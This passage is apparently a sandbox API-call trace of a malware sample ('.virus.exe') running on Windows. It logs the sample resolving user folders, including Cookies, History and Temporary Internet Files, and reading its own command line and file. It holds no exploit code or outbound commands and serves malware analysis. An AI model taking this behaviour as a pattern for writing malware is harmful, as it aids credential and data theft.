lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0071.696] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0071.696] SysReAllocStringLen (in: pbstr=0x32e25a8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x32e25a8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0071.696] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0071.701] SysReAllocStringLen (in: pbstr=0x28fd90*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fd90*="C:\\Users\\kEecfMwgj\\Documents") returned 1 [0071.701] SysReAllocStringLen (in: pbstr=0x28fd94*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0071.702] GetThreadLocale () returned 0x409 [0071.702] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.702] GetThreadLocale () returned 0x409 [0071.702] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.702] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1d [0071.702] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0071.702] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0071.702] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents\\", cchLength=0x1d | out: lpsz="c:\\users\\keecfmwgj\\documents\\") returned 0x1d [0071.702] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x28fd94*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0071.702] SysReAllocStringLen (in: pbstr=0x32e2598*=0x0, psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x32e2598*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0071.702] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0071.704] SysReAllocStringLen (in: pbstr=0x28fd84*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fd84*="C:\\Users\\Public\\Documents") returned 1 [0071.705] SysReAllocStringLen (in: pbstr=0x28fd88*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0071.705] GetThreadLocale () returned 0x409 [0071.705] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.705] GetThreadLocale () returned 0x409 [0071.705] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1a [0071.705] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0071.705] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fcc0*="C:\\Users\\Public\\Documents\\") returned 1 [0071.705] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0071.705] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x28fd88*="c:\\users\\public\\documents\\") returned 1 [0071.705] SysReAllocStringLen (in: pbstr=0x32e25ac*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x32e25ac*="c:\\users\\public\\documents\\") returned 1 [0071.705] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0071.708] SysReAllocStringLen (in: pbstr=0x28fd78*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fd78*="C:\\Program Files (x86)") returned 1 [0071.708] SysReAllocStringLen (in: pbstr=0x28fd7c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0071.708] GetThreadLocale () returned 0x409 [0071.708] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.708] GetThreadLocale () returned 0x409 [0071.708] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.708] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x28fa90*=0x0) returned 0x17 [0071.708] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0071.708] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\") returned 1 [0071.708] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0071.708] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="c:\\program files (x86)\\") returned 1 [0071.709] SysReAllocStringLen (in: pbstr=0x32e25b0*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x32e25b0*="c:\\program files (x86)\\") returned 1 [0071.709] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\ProgramData") returned 0x0 [0071.716] SysReAllocStringLen (in: pbstr=0x28fd6c*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x28fd6c*="C:\\ProgramData") returned 1 [0071.716] SysReAllocStringLen (in: pbstr=0x28fd70*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0071.716] GetThreadLocale () returned 0x409 [0071.716] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.716] GetThreadLocale () returned 0x409 [0071.716] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.716] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x28fa90*=0x0) returned 0xf [0071.716] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0071.716] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fcc0*="C:\\ProgramData\\") returned 1 [0071.716] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0071.716] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x28fd70*="c:\\programdata\\") returned 1 [0071.716] SysReAllocStringLen (in: pbstr=0x32e25b4*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0x32e25b4*="c:\\programdata\\") returned 1 [0071.716] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0071.718] SysReAllocStringLen (in: pbstr=0x28fd60*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fd60*="C:\\Program Files (x86)\\Common Files") returned 1 [0071.718] SysReAllocStringLen (in: pbstr=0x28fd64*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0071.718] GetThreadLocale () returned 0x409 [0071.718] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.718] GetThreadLocale () returned 0x409 [0071.718] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.718] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x28fa90*=0x0) returned 0x24 [0071.718] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0071.718] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0071.718] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0071.718] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x28fd64*="c:\\program files (x86)\\common files\\") returned 1 [0071.718] SysReAllocStringLen (in: pbstr=0x32e25b8*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x32e25b8*="c:\\program files (x86)\\common files\\") returned 1 [0071.718] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0071.720] SysReAllocStringLen (in: pbstr=0x28fd54*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fd54*="C:\\Users\\kEecfMwgj\\Pictures") returned 1 [0071.720] SysReAllocStringLen (in: pbstr=0x28fd58*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0071.720] GetThreadLocale () returned 0x409 [0071.720] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.720] GetThreadLocale () returned 0x409 [0071.721] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.721] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\", lpFilePart=0x28fa90*=0x0) returned 0x1c [0071.721] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0071.721] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0071.721] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures\\", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\pictures\\") returned 0x1c [0071.721] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x28fd58*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0071.721] SysReAllocStringLen (in: pbstr=0x32e25bc*=0x0, psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x32e25bc*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0071.721] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0071.723] SysReAllocStringLen (in: pbstr=0x28fd48*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fd48*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0071.723] SysReAllocStringLen (in: pbstr=0x28fd4c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0071.723] GetThreadLocale () returned 0x409 [0071.723] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.723] GetThreadLocale () returned 0x409 [0071.723] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.723] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x28fa90*=0x0) returned 0x3b [0071.724] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0071.724] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0071.724] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x3b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 0x3b [0071.724] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x28fd4c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0071.724] SysReAllocStringLen (in: pbstr=0x32e25c0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x32e25c0*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0071.724] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0071.726] SysReAllocStringLen (in: pbstr=0x28fd3c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fd3c*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0071.726] SysReAllocStringLen (in: pbstr=0x28fd40*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0071.726] GetThreadLocale () returned 0x409 [0071.726] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.726] GetThreadLocale () returned 0x409 [0071.726] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.726] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x28fa90*=0x0) returned 0x3d [0071.727] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0071.727] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0071.727] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x3d | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x3d [0071.727] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x28fd40*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0071.727] SysReAllocStringLen (in: pbstr=0x32e25c4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x32e25c4*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0071.727] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0071.729] SysReAllocStringLen (in: pbstr=0x28fd30*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fd30*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0071.729] SysReAllocStringLen (in: pbstr=0x28fd34*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0071.729] GetThreadLocale () returned 0x409 [0071.729] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.729] GetThreadLocale () returned 0x409 [0071.729] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.729] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x28fa90*=0x0) returned 0x4c [0071.730] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0071.730] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0071.730] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x4c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x4c [0071.730] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x28fd34*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0071.730] SysReAllocStringLen (in: pbstr=0x32e25c8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x32e25c8*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0071.730] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x32f1c84 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0071.732] SysReAllocStringLen (in: pbstr=0x28fd24*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fd24*="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0071.732] SysReAllocStringLen (in: pbstr=0x28fd28*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0071.732] GetThreadLocale () returned 0x409 [0071.733] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.733] GetThreadLocale () returned 0x409 [0071.733] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.733] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", lpFilePart=0x28fa90*=0x0) returned 0x23 [0071.733] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0071.733] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0071.733] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchLength=0x23 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 0x23 [0071.733] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x28fd28*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0071.733] SysReAllocStringLen (in: pbstr=0x32e25cc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x32e25cc*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0071.733] VirtualFree (lpAddress=0x32f4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0071.739] GetVersion () returned 0x1db10106 [0071.739] GetCurrentProcessId () returned 0xf34 [0071.739] GetCurrentProcess () returned 0xffffffff [0071.739] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0071.739] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0071.739] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0071.740] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0071.740] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0071.791] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", NtPathName=0x28fcd8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.791] NtCreateFile (in: FileHandle=0x28fce8, DesiredAccess=0x80100080, ObjectAttributes=0x28fcbc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: 